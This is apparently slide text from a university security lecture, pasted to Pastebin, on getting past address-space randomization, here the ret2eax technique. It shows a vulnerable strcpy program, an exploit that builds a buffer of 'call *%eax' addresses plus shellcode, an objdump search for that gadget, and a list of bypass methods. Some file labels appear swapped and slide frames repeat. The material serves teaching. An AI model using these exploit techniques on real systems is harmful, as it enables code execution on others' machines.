  1198. function(argv[1]);
  1199. return 1;
  1200. }
  1201. main() function()
  1202. shellcode
  1203. ...
  1204. ...
  1205. ...
  1206. &call *%eax
  1207. leave
  1208. = movl %ebp,%esp
  1209. popl %ebp
  1210. ret
  1211. = popl %eip
  1212. ← EIP
  1213. call *%eax
  1214. Computer Science, Informatik 4
  1215. Communication and Distributed Systems
  1216. EBP = ?
  1217. ESP ➔
  1218. buf
  1219. 5d. ret2eax
  1220. EAX →
  1221. void function(char* str) {
  1222. char buf[256];
  1223. strcpy(buf, str);
  1224. }
  1225. int main(int argc, char **argv) {
  1226. function(argv[1]);
  1227. return 1;
  1228. }
  1229. main() function()
  1230. shellcode
  1231. ...
  1232. ...
  1233. ...
  1234. &call *%eax
  1235. leave
  1236. = movl %ebp,%esp
  1237. popl %ebp
  1238. ret
  1239. = popl %eip
  1240. call *%eax
  1241. EIP →
  1242. Computer Science, Informatik 4
  1243. Communication and Distributed Systems
  1244. EBP = ?
  1245. ESP ➔
  1246. buf
  1247. 5d. ret2eax
  1248. EAX →
  1249. void function(char* str) {
  1250. char buf[256];
  1251. strcpy(buf, str);
  1252. }
  1253. int main(int argc, char **argv) {
  1254. function(argv[1]);
  1255. return 1;
  1256. }
  1257. main() function()
  1258. shellcode
  1259. ...
  1260. ...
  1261. ...
  1262. &call *%eax
  1263. leave
  1264. = movl %ebp,%esp
  1265. popl %ebp
  1266. ret
  1267. = popl %eip
  1268. call *%eax
  1269. EIP →
  1270. Computer Science, Informatik 4
  1271. Communication and Distributed Systems
  1272. vuln.c
  1273. #define CALLEAX 0x08048453
  1274. int main(void) {
  1275. char *buff, *ptr;
  1276. long *adr_ptr;
  1277. buff = malloc(264);
  1278. ptr = buff;
  1279. adr_ptr = (long *)ptr;
  1280. for (i=0; i<264; i+=4)
  1281. *(adr_ptr++) = CALLEAX;
  1282. ptr = buff;
  1283. for (i=0; i<strlen(shellcode); i++)
  1284. *(ptr++) = shellcode[i];
  1285. buff[264] = '\0';
  1286. printf("%s",buff);
  1287. }
  1288. exploit.c
  1289. void function(char* str) {
  1290. char buf[256];
  1291. strcpy(buf, str);
  1292. }
  1293. int main(int argc, char **argv) {
  1294. function(argv[1]);
  1295. }
  1296. 5d. ret2eax
  1297. > objdump -D vuln | grep -B 2 "call"
  1298. 804844f: 74 12 je 8048463
  1299. 8048451: 31 db xor %ebx,%ebx
  1300. 8048453: ff d0 call *%eax
  1301. Find &call *%eax:
  1302. Computer Science, Informatik 4
  1303. Communication and Distributed Systems
  1304. Summary
  1305. 1. Brute force
  1306. 2. Return into non-randomized memory
  1307. a) ret2text
  1308. b) ret2bss
  1309. c) ret2data
  1310. d) ret2heap
  1311. 3. Pointer redirecting
  1312. a) String pointer
  1313. 4. Stack divulging methods
  1314. a) Stack stethoscope
  1315. b) Formatstring vulnerabilities
  1316. 5. Stack juggling methods
  1317. a) ret2ret
  1318. b) ret2pop
  1319. c) ret2esp
  1320. d) ret2eax
  1321. Computer Science, Informatik 4
  1322. Communication and Distributed Systems
  1323. Summary
  1324. 1. Brute force
  1325. 2. Return into non-randomized memory
  1326. a) ret2text
  1327. b) ret2bss
  1328. c) ret2data
  1329. d) ret2heap
  1330. 3. Pointer redirecting
  1331. a) String pointer
  1332. 4. Stack divulging methods
  1333. a) Stack stethoscope
  1334. b) Formatstring vulnerabilities
  1335. 5. Stack juggling methods
  1336. a) ret2ret
  1337. b) ret2pop
  1338. c) ret2esp
  1339. d) ret2eax
  1340. Additional in the paper:
  1341. - DoS by format string vulnerabilities
  1342. - Redirecting function pointers
  1343. - Integer overflows
  1344. - GOT and PLT hijacking
  1345. - Off by one
  1346. - Overwriting .dtors
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!